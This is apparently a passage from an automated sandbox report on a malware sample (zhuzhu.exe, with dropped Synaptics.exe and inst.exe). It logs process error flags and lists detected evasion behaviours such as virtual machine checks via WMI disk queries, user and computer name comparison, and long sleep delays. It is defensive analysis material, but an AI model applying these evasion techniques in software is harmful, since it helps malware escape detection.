                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                      Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      barindex
                                      Contains functionality to compare user and computer (likely to detect sandboxes)
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,7_2_001B8A46
                                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                      Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
                                      Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,7_2_001A67A4
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,7_2_001C88EB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,7_2_00174BD0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetTickCount,_sprintf,7_2_5F4EA873
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,12_2_001A67A4
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,12_2_001C88EB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,12_2_00174BD0
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 3833
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 3177
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeWindow / User API: threadDelayed 2030
                                      Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 4046
                                      Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 5897
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5263
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1287
                                      Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 9872
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-10062
                                      Source: C:\Users\user\Downloads\inst.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
                                      Source: C:\Users\user\Downloads\inst.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-43941
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-43939
                                      Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-76695
                                      Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                      Source: C:\Users\user\Downloads\inst.exeAPI coverage: 0.7 %
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7312Thread sleep time: -4380000s >= -30000sJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5184Thread sleep time: -60000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 7432Thread sleep time: -30000s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 3428Thread sleep time: -3833000s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 4412Thread sleep time: -31770s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe TID: 3428Thread sleep time: -2030000s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exe TID: 8012Thread sleep time: -6069000s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exe TID: 8012Thread sleep time: -8845500s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 5263 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 1287 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -3689348814741908s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 43 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\Downloads\inst.exeFile opened: PhysicalDrive0
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\splwow64.exeLast function: Thread delayed
                                      Source: C:\Windows\splwow64.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeThread sleep count: Count: 3177 delay: -10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformation
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,7_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,7_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_001C3FB0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_5F52A6BA
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,12_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,12_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_001C3FB0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_037780F0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03775430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03775430
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeThread delayed: delay time: 30000
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                      Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\userJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppDataJump to behavior
                                      Source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.drBinary or memory string: !Datacenter without Hyper-V (core)
                                      Source: Amcache.hve.22.drBinary or memory string: VMware
